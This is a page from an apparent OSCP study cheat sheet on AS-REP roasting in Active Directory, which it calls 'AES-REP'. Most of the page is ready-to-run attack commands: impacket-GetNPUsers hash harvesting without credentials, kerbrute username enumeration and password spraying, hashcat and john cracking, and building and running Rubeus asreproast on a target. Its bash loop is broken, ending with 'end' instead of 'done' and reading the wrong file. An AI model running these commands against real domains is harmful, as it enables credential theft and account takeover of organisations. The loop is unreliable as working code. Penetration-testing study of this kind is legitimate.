Oscp
  • Windows
    • Active Directory Oscp Cheat sheet
    • SMB enumeration and rpcclient
    • NTLM Theft
  • LDAP Enumeration
  • Lateral Movement in Active Directory
  • AES-REP Roasting
  • Kerberoasting
  • BloodHound
  • Silver Tickets
  • Golden Tickets
  • Pass the hash and Overpass the hash
  • Port Forwarding
  • Windows privilege Escalation
Powered by GitBook
On this page
  • Linux
  • Windows

AES-REP Roasting

PreviousLateral Movement in Active DirectoryNextKerberoasting

Last updated 2 months ago

AS-REP Roasting is a technique to exploit misconfigured Kerberos authentication in Active Directory. It targets user accounts with "Do not require Kerberos pre-authentication" enabled, allowing attackers to request encrypted Ticket Granting Tickets (TGTs) for offline cracking. This can reveal plaintext passwords if weak encryption is used. It's a common attack for privilege escalation in AD environments.

Linux

  • AES-REP without credentials

  impacket-GetNPUsers blackfield.local/c.smith -request -no-pass -dc-ip 10.10.10.175
#looping through users.txt
cat cube | while read p
    impacket-GetNPUsers blackfield.local/"$p" -request -no-pass -dc-ip 10.10.10.175 >> hash.txt
end
#or 

impacket-GetNPUsers.py -no-pass -usersfile users -dc-ip 10.10.10.192 blackfield.local | grep krb5asrep

  • AES-REP with credentials of user frishta in domain cube.com and output file is hashes

impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes cube.com/frishta

  • if u have a list of users Kerbrute can also be used to username bruteforce 

kerbrute userenum -d baby.vl --dc 10.10.83.40 ./users.txt -v
#password bruteforce
kerbrute passwordspray -d baby.vl --dc 10.10.83.40 ./users.txt 'Password123!' -v

  • crack the hash using 

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast

Windows

  • Kerbrute

.\kerbrute_windows_amd64.exe passwordspray -d cor.com .\users.txt "Cube123!"

  • Rubeus

check .Net version on the target system 

(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full").Version
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" /v Version

open .sln file with visual studio and

right click on project and then select properties

Then select the .Net frame work version accordingly to the target machine

go to configuration manager

selct release

close it and select build solution

thats it the .exe file be built according to the .Net version

  • Now transfer rubeus.exe to the target and run the following command use nowrap so that u dont run into unwanted spaces and new lines

.\Rubeus.exe asreproast /nowrap

Download the Zip file

Or if u wanna directly get .exe u can get it from here but may get compatibility issue if .Net version doesnt match

https://github.com/ropnop/kerbrute/releases
https://github.com/GhostPack/Rubeus/releases/tag/1.6.4
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries